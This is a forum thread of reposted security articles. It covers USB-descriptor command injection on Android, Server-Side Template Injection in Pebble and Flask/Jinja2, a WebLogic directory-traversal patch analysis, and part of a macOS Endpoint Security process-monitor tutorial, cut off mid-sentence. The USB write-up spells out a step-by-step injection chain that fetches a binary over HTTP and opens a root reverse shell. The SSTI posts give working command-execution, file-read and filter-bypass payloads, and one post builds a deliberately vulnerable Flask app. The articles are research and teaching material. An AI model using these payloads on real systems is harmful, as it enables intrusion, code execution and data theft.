Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 1 Device Qualifier (for other device speed): bLength 10 bDescriptorType 6 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 bNumConfigurations 1 Device Status: 0x0000 (Bus Powered) You can see the device here: $ ls -lh /dev/disk/by-id lrwxrwxrwx 1 root root 9 Aug 2 14:35 usb-Linux_File-CD_Gadget_0000000000000000-0:0 -> ../../sdb lrwxrwxrwx 1 root root 10 Aug 2 14:35 usb-Linux_File-CD_Gadget_0000000000000000-0:0-part1 -> ../../sdb1 And you should be able to mount: $ mkdir HAX && sudo mount /dev/sdb1 HAX I felt like Neo when that worked. Right now this is just a glorified thumb drive though. The real fun comes with the fact that we can change parameters: # echo 0 > /sys/class/android_usb/android0/enable # echo 1337 > /sys/class/android_usb/android0/idProduct # echo 'Carve Systems' > /sys/class/android_usb/android0/iManufacturer # echo '1337 Hacking Team' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable $ lsusb -v -d 18d1: Bus 003 Device 044: ID 18d1:1337 Google Inc. Device Descriptor: .... idProduct 0x1337 .... iManufacturer 1 Carve Systems iProduct 2 1337 Hacking USB .... Wow does that make it easy to make a malicious USB device. Hacking the Thing To bring everything full circle, I’ll go through the actual exploit that inspired this. The code I was exploiting looked somewhat similar to this: snprintf(dir, DIR_SIZE, "/mnt/storage/%s%s%s", LABEL, iManufacturer, iProduct); snprintf(cmd, CMD_SIZE, "mount %s %s", /dev/DEVICE, dir); system(cmd); My proof of concept exploit was the following: Drop a shell script at the vulnerable daemon’s cwd that will spawn a reverse shell Execute that file with sh One tricky bit is that they were removing whitespace and / from those variables, but luckily system was passing to a shell that understands $IFS and sub-shells. Once I had the Android device setup, exploiting this issue was straightforward, commands would be built as follows: echo 0 > enable echo ';{cmd};' > iProduct echo 1 > enable With the entire command chain looking like this (I removed some sleep commands that were necessary): # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}b=`printf$IFS'"'"'\\x2f'"'"'`>>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}s=\"$IFS\">>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}u=http:\$b\${b}192.168.1.152:8000\${b}shell>>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}curl\$s-s\$s-o\${s}shell\$s\$u>>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}chmod\$s+x\${s}shell>>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}\${b}shell>>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';sh${IFS}a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable All of those commands together create the following file (/a😞 b=/ s=" " u=http:$b${b}192.168.1.152:8000${b}shell curl$s-s$s-o${s}shell$s$u chmod$s+x${s}shell ${b}shell The last command executes the file with sh a. This script pulls a binary I wrote to get a reverse shell. You could send your favorite reverse shell payload, but this way is always simple and makes verification quick. Upon the last command being executed, we’re greeted with the familiar: $ nc -l -p 3567 id uid=0(root) gid=0(root) groups=0(root) Nice. Takeaways While it is probably easier to get yourself a Raspberry Pi Zero, it is pretty handy that this can be done so easily through a rooted Android device. As for security takeaways: it is important to remember that ANY external input, even from physical devices, is not trustworthy. Also blacklists can sometimes leave holes that are easy to bypass. There were many ways to avoid this issue, but the most important part of any mitigation would be to not trust properties pulled off of an external device. If you need a unique name, generate a UUID. If you need a unique name that is constant for a given device, verify the required parameters exist and then hash them using SHA256 or your favorite hashing algorithm. The system C function should also be used sparingly: it is fairly straightforward to mount drives using just C code. Sursa: https://carvesystems.com/news/command-injection-with-usb-peripherals/
  6. Server Side Template Injection – on the example of Pebble Michał Bentkowski | September 17, 2019 | Research Server-Side Template Injection isn’t exactly a new vulnerability in the world of web applications. It was made famous in 2015 by James Kettle in his famous blogpost on PortSwigger blog. In this post, I’ll share our journey with another, less popular Java templating engine called Pebble. Pebble and template injection According to its official page, Pebble is a Java templating engine inspired by Twig. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization. It supports one of the most common syntax in templating engines, in which the variable substitution is done with {{ variable }}. More often than not, in templating engines it is possible to include arbitrary Java expressions. Imagine that you have a variable called name and you want to put it upper-case in the template, then you can use {{ name.toUpperCase() }}. The usual way of exploiting template injection in various expression languages in Java is to use code similar to the following: variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') 1 variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') Basically, every object in Java has a method called getClass() which retrieves a special java.lang.Class from which it is easy to get instance of arbitrary Java class. The usual next step is to get an instance of java.lang.Runtime since it allows to execute OS commands. When we came across Pebble for the first time, the code was basically identical to the one shown above. The only thing that needed to be done was to add mustache tags on the both sides: {{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }} 1 {{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }} Attempts to protect against getting arbitrary classes in Pebble The author of Pebble added a protection against the attack and blocked method invocation of getClass(). Initially, though, there was a funny way to bypass it because Pebble tried to be smart when looking for methods in expressions. Suppose you have the following expression: {{ someString.toUPPERCASE() }} 1 {{ someString.toUPPERCASE() }} The expression shouldn’t work since the right name of the method is toUpperCase() not toUPPERCASE(). Pebble, though, ignored casing in methods or properties names. So with the code above, you would actually call the “normal” toUpperCase(). So the issue was that when Pebble tried to block access to getClass(), it checked the name of the method case sensitive. So you could just use the following statement: {{ someString.getCLASS().forName(...) }} 1 {{ someString.getCLASS().forName(...) }} and bypass the protection. This issue was fixed in April 2019 in version 3.0.9 by making the comparison case insensitive. A few months later, when researching some other Java-related stuff and skimming through the documentation, I noticed that there is another built-in way to get access to instance of java.lang.Class. A few wrapper classes in java, like java.lang.Integer, has a field called TYPE whose type is java.lang.Class itself! Hence another way to execute arbitrary code is shown below: {{ (1).TYPE.forName(...) }} 1 {{ (1).TYPE.forName(...) }} I reported the issue to Pebble in July 2019, and it was fixed in master using the same approach as is used in FreeMarker, ie. a blacklist of method calls. So while I still can do {{ (1).TYPE }}, forName() method is blocked making it “impossible” to execute arbitrary code. I put the word “impossible” in quotes since I believe that a bypass is still out there to be found but I was unable to do so. That’s an interesting space to do some research. Reading the output of command (Java 9+) While it’s always been easy to execute arbitrary command in Java, in case of vulnerabilities like Server-Side Template Injection, sometimes it happens to be difficult to read the output. It was usually done via iterating over the resulting InputStream or sending the output out-of-band. When researching Pebble, I noticed that things got much easier in Java 9+ since now InputStream has a convenient method readAllBytes which returns a byte array! Then byte[] can be converted to String with the String constructor. Here’s the exploit: {% set cmd = 'id' %} {% set bytes = (1).TYPE .forName('java.lang.Runtime') .methods[6] .invoke(null,null) .exec(cmd) .inputStream .readAllBytes() %} {{ (1).TYPE .forName('java.lang.String') .constructors[0] .newInstance(([bytes]).toArray()) }} 1 2 3 4 5 6 7 8 9 10 11 12 {% set cmd = 'id' %} {% set bytes = (1).TYPE .forName('java.lang.Runtime') .methods[6] .invoke(null,null) .exec(cmd) .inputStream .readAllBytes() %} {{ (1).TYPE .forName('java.lang.String') .constructors[0] .newInstance(([bytes]).toArray()) }} And the result: Pebble example exploit Playing with Pebble If you wish to play with Pebble, we have prepared a GitHub repo with a Docker container in which you can run various versions of Pebble. You can grab it here: https://github.com/securitum/research/tree/master/r2019_server-side-template-injection-on-the-example-of-pebble. All you need to do is to make sure you have both docker and docker-compose installed and then just run docker-compose up. Then, the webserver runs on http://localhost:4567. Screenshot of Docker application Summary Pebble is not different that many other popular templating engines in which you can execute arbitrary commands if you are allowed to modify the template itself. The recommendation is to make sure that unauthorized users should never be able to modify templates. Author: Michał Bentkowski Sursa: https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/
  7. RCE with Flask Jinja Template Injection AkShAy KaTkAr Sep 17 · 4 min read I got invite for private program on bugcrowd. Program do not have huge scope , just a single app with lots of features to test. I usually likes this kind of programs as I am not that good with recon . First thought , Lets Find out what technology a website is built with. I use wappalyzer for that. They were using Angular dart , python Django & flask . +.Being a Python developer for last few years , I know where commonly developer makes mistakes . There were one utility named work flow builder . which use to build a financial close process flow. You can automate daily activities with it like sending approval & sending reminder emails. Sending emails functionality caught my attention because most of times this email generator apps are vulnerable to template injection. As this website built with python , i was quite sure that they must be using Jinja2 template. Send email function have 3 fields . To , title & description . I set {{7*7}} as title & description & click on send email button . I got email as “49” as subject & {{7*7}} as description . So the subject field was vulnerable for template injection. Payload : {{7*7}} Payload {{7*7}} basically what this doing is evaluating python code inside curly brackets . I tried another payload to get list of sub classes of object class. Payload : {{ [].__class__.__base__.__subclasses__() }} I got email containing list of sub classes of object class. like below Payload : {{ [].__class__.__base__.__subclasses__() }} Let me explain you this payload , If you are familiar with python , You may know we can create list by using “[]” . You can try this things in python interpreter . Access class of list >>> [].__class__ <type 'list'> #return class of list 2. Access base class of list . >>> [].__class__.__base__ <type 'object'> #return base class of list List is sub class of “object” class. 3.Access sub classes of object class . >>> [].__class__.__base__.__subclasses__() [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>..... So our payload gives us a list of all sub classes “object” class. I reported this issue as it is , hoping I don’t have to go further to prove it’s significant impact. bugcrowd triager reply me with this Ok , so now I have to provide POC to prove impact of this issue to mark it as P1. Most of django apps have config file which contains really sensitive info like AWS keys , API’s & encryption keys. I have path of that config file from my previous findings. So i decided to read that file . To read file in python you have to create object of “file”. We already have list of all sub classes of “Object class”. Lets find index of file class >>> [].__class__.__base__.__subclasses__().index(file) 40 #return index of "file" object When you run “[].__class__.__base__.__subclasses__().index(file)” this payload in python interpreter you will get index of “file” object. I tried same payload but it gives me nothing , something is wrong . I tried to access other objects but its giving similar error , not returning any value. Next , I decided to directly access file object as we know index of file object in “Object ” sub classes list is “40". So I tried this payload {{[].__class__.__base__.__subclasses__()[40] }} but got no success, this payload also returning similar result as above image. Payload is breaking somewhere , but not able to find where. After some research , I got on conclusion that may be indexing is block or breaking my payload. If you know little bit of python you may know there are multiple methods to return value in list , one of method is using “pop” function . >>> [1,2,3,4,5].pop(2) 3 Above code returning third value of list & removing it from that list. So now my new payload is {{[].__class__.__base__.__subclasses__().pop(40) }} Above payload gives me object of “file” . Ok, So now I have object of “file” , I can read any file on server . Let’s read “etc/passwd” file . Payload : {{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}. etc/passwd output in email subject Finally , I was able to read files on server. I also able to read local files on the GCE instance responsible for sending notifications, including some source code, and configuration files containing very sensitive values (e.g. API and encryption keys). Thanks for reading, If you like this article please share. You are free to ask any questions , Just DM me on akshukatkar . — — Morningstar Sursa: https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870
  8. Patch Analysis: Examining a Missing Dot-Dot in Oracle WebLogic September 17, 2019 | KP Choubey Earlier this year, an Oracle WebLogic deserialization vulnerability was discovered and released as an 0day vulnerability. The bug was severe enough for Oracle to break their normal quarterly patch cadence and release an emergency update. Unfortunately, researchers quickly discovered the patch could be bypassed by attackers. Patches that don’t completely resolve a security problem seem to be a bit of a trend, and Oracle is no exception. This blog covers a directory traversal bug that took more than one try to get fully corrected. Oracle initially patched this vulnerability as CVE-2019-2618 in April 2019, but later released a corrected patch in July. Vulnerability Details Oracle WebLogic is an application server for building and deploying Java Enterprise Edition (EE) applications. The default installation of the WebLogic server contains various applications to maintain and configure domains and applications. One such application is bea_wls_deployment_internal.war, which contains a feature to upload files. A file can be uploaded by sending an authenticated request to the URI /bea_wls_deployment_internal/DeploymentService. The application calls the handlePlanOrApplicationUpload() method if the value of the wl_request_type header of the request is “app_upload” or “plan_upload”. The handlePlanOrApplicationUpload() method validates the value of the wl_upload_application_name header and checks for two variants of directory traversal characters: ../ and /..: Figure 1 - Directory Traversal Character Checks – With Comments Added The path <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\upload\ is stored in variable uploadingDirName. The wl_upload_application_name request header value is used as subdirectory of this path. The method shown above appends the user-controlled value wl_upload_application_name to uploadingDirName and passes it via the saveDirectory argument of doUploadFile(). The doUploadFile() function should create a file in this location using the filename parameter of the request: Figure 2 - The doUploadFile() Function The wl_upload_application_name and filename fields were vulnerable to directory traversal. In April 2019, Oracle tried to patch the directory traversal as CVE-2019-2618. The patch for CVE-2019-2618 added checks for two more variants of directory traversal characters in the wl_upload_application_name field: \.. and ..\: Figure 3 - Code Changes from CVE-2019-2618 For the filename field, CVE-2019-2618 added a check to doUploadFile() to ensure the final path where the file is saved contains the proper save directory as indicated by variable saveDir. The value of saveDir is <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\upload\[UPLOAD_APP], where the value of [UPLOAD_APP] is found in wl_upload_application_name. The patched doUploadFile() method throws an error if filename variable contains directory traversal characters and does not contain the string represented by saveDir: Figure 4 - Exception Error for saveDir This validation of the fileName field is mostly sufficient. As a side note, though, it would have been better if they had used startsWith instead of contains. The way the patch is written, the validation theoretically can be bypassed if anywhere within the final path there is a substring resembling the legitimate save path. There is no direct route to exploitation, though. The doUploadFile() function will not automatically create a directory structure if the one specified by saveTo doesn’t exist. So, for a bypass of the above patch to be relevant, an attacker would need some other technique that is powerful enough to enable creation of arbitrary directory structures within a sensitive location on the server, yet fails to offer a file upload capability of its own. On the whole, this is an unlikely scenario. However, in regard to the wl_upload_application_name header field, the CVE-2019-2618 patch is inadequate and can be bypassed by setting the value wl_upload_application_name header to .. (dot-dot). This allows uploading to any subdirectory of the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer directory. Note the absence of the final path component, which should be “upload”. This is a sufficient condition to achieve code execution by writing a JSP file within the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\tmp\ directory. An example of a POST request to write a file poc.jsp to a location within the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\tmp directory is as follows: Figure 5 - Demonstration the Directory Traversal A file written to the \_WL_internal\bea_wls_internal subdirectory of the tmp directory can be accessed without authentication. For the aforementioned example, the attacker can execute JSP code by sending a request to the URI /bea_wls_internal/pos.jsp. The patch for CVE-2019-2827 released in July fixed the directory traversal vulnerability correctly by validating the wl_upload_application_name header field for .. (dot-dot) directory traversal characters as follows: Figure 6 - Code Changes for CVE-2019-2827 Conclusion Variations of directory traversal bugs have existed for some time, but continue to affect multiple types of software. Developers should ensure they are filtering or sanitizing user input prior to using it in file operations. Over the years, attackers have used various encoding tricks to get around traversal defenses. For example, using URI encoding “%2e%2e%2f” translates to “../” and could evade some filters. Never underestimate the creativity of those looking to exploit your systems. While this blog covers a failed patch from Oracle, multiple vendors have similar problems. Patch analysis is a great way to probe for things that may have been missed by the developers, and a great way to find related bugs is to examine the patched components. You can find me on Twitter @nktropy, and follow the team for the latest in exploit techniques and security patches. Sursa: https://www.zerodayinitiative.com/blog/2019/9/16/patch-analysis-examining-a-missing-dot-dot-in-oracle-weblogic
  9. Explaining Server Side Template Injections Web Hacking chivato Hey, I am chivato, this is my first post on here and I hope it is of some use to people. Exploiting SSTI in strange cases will be the next post I make. Any and all feedback is appreciated <3. Building the environment: We start with just a basic flask web application, written in python (I will be using python 2), which is as follows: from flask import * app = Flask(__name__) @app.route("/") def home(): return "Hello, World!" if __name__ == "__main__": app.run(debug=True, host="localhost", port=1337) This website will just return “Hello, World!” when visited. Now, we need to add parameters so we can interact with the web application. This can be done with the “requests” part of Flask, so we just add request.args.get(‘parameter name’). In my case the parameter will be called “name”, here is how our code should look: from flask import * app = Flask(__name__) @app.route("/") def home(): output = request.args.get('name') return output if __name__ == "__main__": app.run(debug=True, host="localhost", port=1337) But since this always returns the value in the get request, if you go to the website without a get parameter called name, you will get an error. To fix this I included a simple if statement: from flask import * app = Flask(__name__) @app.route("/") def home(): output = request.args.get('name') if output: pass else: output = "Empty" return output if __name__ == "__main__": app.run(debug=True, host="localhost", port=1337) Perfect, now we have a flask app that returns the value in the get parameter and doesn’t crash. Now to implement the vulnerability, the vulnerability consists of templates being executed on the side of the server, when we have control of what the template contains, for example a vulnerability was found in Uber by the famous bug hunter known as orange, it consisted of making your profile name follow the template syntax for jinja2 (which is {{template content}} for jinja2). and then when you received the email, the template had been executed. So, imagine you set {{‘7’*7}} as your username, when you receive the email, you will see “Welcome 7777777.” As stated above, the vulnerability comes into play when the template is executed on the side of the server, and we control the input, so let’s make sure our input is rendered. This can be done with render_template_string from flask. This takes a string, and treats it as text that may have any templates in it, if it does, then it executes the template. from flask import * app = Flask(__name__) @app.route("/") def home(): output = request.args.get('name') output = render_template_string(output) if output: pass else: output = "Sp0re<3" return output if __name__ == "__main__": app.run(debug=True, host="localhost", port=1337) As you can see, now, if you visit “http://localhost:1337/?name={{‘7’*7} 3}”, you will be welcomed with “7777777”. We now have our environment setup and ready to play with (later on I will be looking at some simple WAF bypass methods, but for now we are just leaving our script as this). Recongnising and exploiting the vulnerability: So template engines are used VERY widely nowadays, and they exist for a variety of different languages, such as PHP, JS, Python (obviously), ruby and many more. The base of why they are useful is in case you have a large website or platform, where not many details change between pages. For example, netflix, has the same layout for it’s content, and the only things that change are: title, description, banner and some other minor details, so instead of creating a whole page per show, they just feed the data to their templates, and then the engine puts it all together. Template engines can be used for anything that follows that process of having to use the same thing tons of times, so in Uber’s example instead of making a new email every time, they had a single email template, and just changed in the name each time. So, knowing that we can execute templates, what can we actually do with that, well, honestly a lot. > Read the configuration. This can be used to grab the SECRET_KEY which is used to sign cookies, with this, you can create and sign your own cookies. Example payload for Jinja2: {{ config }} > Read local files (LFR). This can be used to do a variety of things, ranging from directly reading a flag if it is held in the templates folder with a basic {% include ‘flag.txt’ %}, to reading any file on the system this can be via the RCE payload (see next point), or via an alternative. An example payload of an alternative would be: {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} //May vary depending on version. > Remote command execution (RCE). Finally, the remote command execution payload. Obviously the most severe and dangerous one, and can be done a variety of ways, one is going through the subclasses and finding the subprocess.Popen number: {{''.__class__.mro()[1].__subclasses__()[ HERE IS WHERE THE NUMBER WOULD GO ]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} Although I have had much more success with the following payload, which uses Popen without guessing the offset. {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("whoami").read().zfill(417)}}{%endif%}{% endfor %} You may need to go to the end of the page to skip all the 0’s that are produced from that payload. Now that some of the basic exploits are over, we can take a look at bypass methods. Let’s start with the parameter bypass method. Imagine you have a template engine, in this case flask, that takes a value from a parameter and removes any “_” from it. This would restrict us from doing a variety of things, for example {{ __class__ }}. So, this bypass mehtod is based off of the idea that, only that parameter gets checked for the underscores. So all we have to do is pass the underscores via another parameter, and call them from our template injection. We start with calling the class attribute from request (The waf would block the underscores). {{request.__class__}} Then, we remove the “.” and user the |attr to tell the template that we are using request’s attributes. {{request|attr("__class__")}} We pipe the whole content of the “attribute” parameter to a “join” function, which sticks all of the value together, in this case it would stick “", “class” and "” together, to create class. {{request|attr(["__","class","__"]|join)}} We then remove one of the underscores, and just multiply the single one by two, in python, using “[STRING]”*[NUMBER] will make a new string of the previously stated strings, that amount of times. So “test”*3 would be equal to “testtest”. {{request|attr(["_"*2,"class","_"*2]|join)}} Finally, we tell the paytload to get the underscores from the other parameter called “usc”, and we add the underscores to the other parameter, an example URL to use against our script would be: http://localhost:1337/?name={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&usc=_ This may just return Empty, since we set an if statement that basically stated if out rendered template is empty then just set the output to Empty. Moving on to the next bypass method, this one is used to bypass the “[”, “]” being blocked, since they are needed for the payload stated above. It is honestly just a syntax thing, but it manages to achieve the same thing, without having to use any “[”, “]”, or “_”. Some examples are: http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_ http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_ These were pulled from an amazing page called “PayloadAllTheThings”, link can be found at the bottom of the article in the sources part. Another one is in case “.” is blocked, and it uses the Jinja2 filters with |attr(): http://localhost:1337/?name={{request|attr(["_"*2,"class","_"*2]|join)}} Finally, a bypass method that is used in case “[”, “]”, “|join” and / or “_” is blocked, since it uses none of the previously stated characters: http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ Now these are just the base bypass payloads, but can be combined and manipulated to achieve some amazing things. Here is a payload I made myself to build a payload that leaks the config: {{request|attr(["url",request.args.usc,"for.",request.args.usc*2,request.args.1,request.args.usc*2,".current",request.args.usc,"app.",request.args.conf]|join)}}&1=globals&usc=_&link=url&conf=config Conclusion: This has just been a basic explanation of how to setup a website vulnerable to SSTI, how the exploitation works, and some basic bypass methods for any WAF’s that you may encounter. Also would like to shout out a moderator from HackTheBox called “makelaris”, since he was actually the one who sparked my interest for SSTI’s, and has taught me a lot about them. If this post is enjoyed and appreciated I will make more about more advanced SSTI exploitation cases, and also how SSTI’s may work and be exploited in other template engines. Sources: PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md 13 pequalsnp-team: https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti 2 A good HackTheBox retired machine that has an SSTI step: Oz (https://www.hackthebox.eu/home/machines/profile/152 2) A writeup for Oz machine: https://0xdf.gitlab.io/2019/01/12/htb-oz.html 1 More exploring SSTI’s: https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html 2 Orange’s disclosed bug bounty report from Uber: https://hackerone.com/reports/125980 10 Sursa: https://0x00sec.org/t/explaining-server-side-template-injections/16297
  10. Writing a Process Monitor with Apple's Endpoint Security Framework September 7, 2019 Our research, tools, and writing, are supported by “Friends of Objective-See” Today’s blog post is brought to you by: CleanMy Mac X Malwarebytes Airo AV Become a Friend! # ./processMonitor Starting process monitor...[ok] PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC') pid: 7655 path: /bin/ls uid: 501 args: ( ls, "-lart", "." ) signing info: { cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850; csFlags = 603996161; isPlatformBinary = 1 (true); signatureIdentifier = "com.apple.ls"; } On github: Process Monitoring Library Background A common component of (many) security tools is a process monitor. As its name implies, a process monitor watches for the creation of new processes (plus extracts information such as process id, path, arguments, and code-signing information). Many of my Objective-See tools track process creations. Examples include: Ransomwhere? Tracks process creations to classify processes (as belonging to the OS/Apple, from 3rd-party developers. etc.) such that if a process beings rapidly encrypting files, Ransomwhere? can quickly determine if this encryption is legitimate or possibly ransomware. TaskExplorer Tracks process creations (and terminations) in order to display a real-time list of active processes to the user. BlockBlock Tracks process creations to map process identifiers (pids) reported in persistent file events to full process paths in order to provide more informative alerts to users, when persistence events occur. After a while I got tired of including duplicative process monitoring code in each project, so decided to write a process monitoring library. Now, any tool that is interested in tracking process events can simply link against this library. The source code for this (original) process monitoring library, can be found on the Objective-See’s github page: Proc Info Until now, the preferred way to programmatically create a process monitor was to subscribe to events from Apple’s OpenBSM subsystem. For a deep-dive into the OpenBSM subsystem, check out my ShmooCon talk: “Get Cozy with OpenBSM Auditing“ Though sufficient, the OpenBSM subsystem is rather painful to programmatically interface with. For starters, it requires one to parse and tokenize various (binary) audit records and audit tokens (that amongst other things contain process-related events): 1//init (remaining) balance to record's total length 2recordBalance = recordLength; 3 4//init processed length to start (zer0) 5processedLength = 0; 6 7//parse record 8// read all tokens/process 9while(0 != recordBalance) 10{ 11 //extract token 12 // and sanity check 13 if(-1 == au_fetch_tok(&tokenStruct, recordBuffer + processedLength, recordBalance)) 14 { 15 //error 16 // skip record 17 break; 18 } 19 20 //now parse tokens 21 // looking for those that are related to process start/terminated events 22 23 //add length of current token 24 processedLength += tokenStruct.len; 25 26 //subtract length of current token 27 recordBalance -= tokenStruct.len; 28 29} Moreover, the audit events delivered by the OpenBSM subsystem do not contain information about the processes code-signing identifies. Thus once you receive an audit event related to process creation, if you want to know for example, if said process is signed by Apple proper, you have to write extra code to programmaticly extract this information. This is relatively non-trivial and may be computationally (CPU) intensive. Finally, the OpenBSM audit subsystem (by design) is reactive, meaning that by the time you’ve received the events (i.e. process creation) it’s already occurred. This runs the gamut from being mildly annoying (for example, a short-lived process may have already exited, being you cannot query it to retrieve it’s code-signing identity) to well rather problematic. For example, if you’re a writing a security tool, clearly there exist many scenarios where being proactive about process events would be ideal (i.e. blocking a piece of malware before its allowed to execute). Until now, the only way to realize proactive security protections was to live in the kernel (something that Apple is rather drastically deprecating) Apple’s Endpoint Security Framework With Apple’s push to kick 3rd-party developers (including security products) out of the kernel, coupled with the realization (finally!) that the existing subsystems were rather archaic and dated, Apple recently announced the new, user-mode “Endpoint Security Framework” (that provides a user-mode interface to a new “Endpoint Security Subsystem”). As we’ll see, this framework addresses many of the aforementioned issues & shortcomings. Specifically it provides a: well-defined and (relatively) simple API comprehensive process code-signing information for events the ability to proactively respond to process events (though here, our process monitor will be passive). I’m often somewhat critical of Apple’s security posture (or lack thereof). However, the “Endpoint Security Framework” is potentially a game-changer for those of us seeking to write robust user-mode security tools for macOS. Mahalo Apple! Personally I’m stoked 🥳 This blog is practical walk-thru of creating a process monitor which leverages Apple’s new framework. For more information on the Endpoint Security Framework, see Apple’s developer documentation: Endpoint Security Framework In this blog, we’ll illustrate exactly how to create a comprehensive user-mode process monitor that leverages Apple’s new framework. There are a few prerequisites to leverage the Endpoint Security Framework that include: The com.apple.developer.endpoint-security.client entitlement This can be requested from Apple via this link. Until then (I’m still waiting 😅), give yourself that entitlement (i.e. in your app’s Info.plist file, and disable SIP such that it remains pseudo-unenforced). <dict> <key>com.apple.developer.endpoint-security.client</key> <true/> </dict> Xcode 11/macOS 10.15 SDK As these are both (still) in beta, for now, it’s recommended to perform development in a virtual machine (running macOS 10.15, beta). macOS 10.15 (Catalina) It appears the Endpoint Security Framework will not be made available to older versions of macOS. As such, any tools the leverage this framework will only run on 10.15 or newer. Ok enough chit-chat, let’s dive in! Our goal is simple: create a comprehensive user-mode process monitor that leverages Apple’s new “Endpoint Security Framework”. Besides “capturing” process events, we’re also interested in: the process id (pid) the process path any process arguments any process code-signing information …luckily, unlike the OpenBSM subsystem, the new Endpoint Security Framework makes this a breeze! Besides Apple’s documentation, the “Endpoint Security Demo” on github, by a developer named Omar Ikram was hugely helpful! Thanks Omar! 🙏 In order to subscribe to events from the “Endpoint Security Subsystem”, we must first create a new “Endpoint Security” client. The es_new_client function provides the interface to perform this action: Various (well commented!) header files in the usr/include/EndpointSecurity/ directory (such as ESClient.h) are also great resources. $ ls /Library/Developer/CommandLineTools/SDKs /MacOSX10.15.sdk/usr/include/EndpointSecurity/ ESClient.h ESMessage.h ESOpaqueTypes.h ESTypes.h EndpointSecurity.h $ less EndpointSecurity/ESClient.h struct es_client_s; /** * es_client_t is an opaque type that stores the endpoint security client state */ typedef struct es_client_s es_client_t; /** * Initialise a new es_client_t and connect to the ES subsystem * @param client Out param. On success this will be set to point to the newly allocated es_client_t. * @param handler The handler block that will be run on all messages sent to this client * @return es_new_client_result_t indicating success or a specific error. */ In code, we first include the EndpointSecurity.h file, declare a global variable (type: es_client_t*), then invoke the es_new_client function: 1#import <EndpointSecurity/EndpointSecurity.h> 2 3//(global) endpoint client 4es_client_t* endpointClient = nil; 5 6//create client 7// callback invokes (user) callback for new processes 8result = es_new_client(&endpointClient, ^(es_client_t *client, const es_message_t *message) 9{ 10 //process events 11 12}); 13 14//error? 15if(ES_NEW_CLIENT_RESULT_SUCCESS != result) 16{ 17 //err msg 18 NSLog(@"ERROR: es_new_client() failed with %d", result); 19 20 //bail 21 goto bail; 22} Note that the es_new_client function takes an (out) pointer to the variable of type es_client_t. Once the function returns, this variable will hold the initialized endpoint security client (required by all other endpoint security APIs). The second parameter of the es_new_client function is a block that will be automatically invoked on endpoint security events (more on this shortly!) The es_new_client function returns a variable of type es_new_client_result_t. Peeking at the ESTypes.h reveals the possible values for this variable: $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h /** @brief Error conditions for creating a new client */ typedef enum { ES_NEW_CLIENT_RESULT_SUCCESS, ///One or more invalid arguments were provided ES_NEW_CLIENT_RESULT_ERR_INVALID_ARGUMENT, ///Communication with the ES subsystem failed ES_NEW_CLIENT_RESULT_ERR_INTERNAL, ///The caller is not properly entitled to connect ES_NEW_CLIENT_RESULT_ERR_NOT_ENTITLED, ///The caller is not permitted to connect. They lack Transparency, Consent, and Control (TCC) approval form the user. ES_NEW_CLIENT_RESULT_ERR_NOT_PERMITTED } es_new_client_result_t; Hopefully these are rather self explanatory (i.e. ES_NEW_CLIENT_RESULT_SUCCESS means ok! while ES_NEW_CLIENT_RESULT_ERR_NOT_ENTITLED means you don’t hold the com.apple.developer.endpoint-security.client entitlement). If all is well, the es_new_client function will return ES_NEW_CLIENT_RESULT_SUCCESS indicating that it has created newly initialized Endpoint 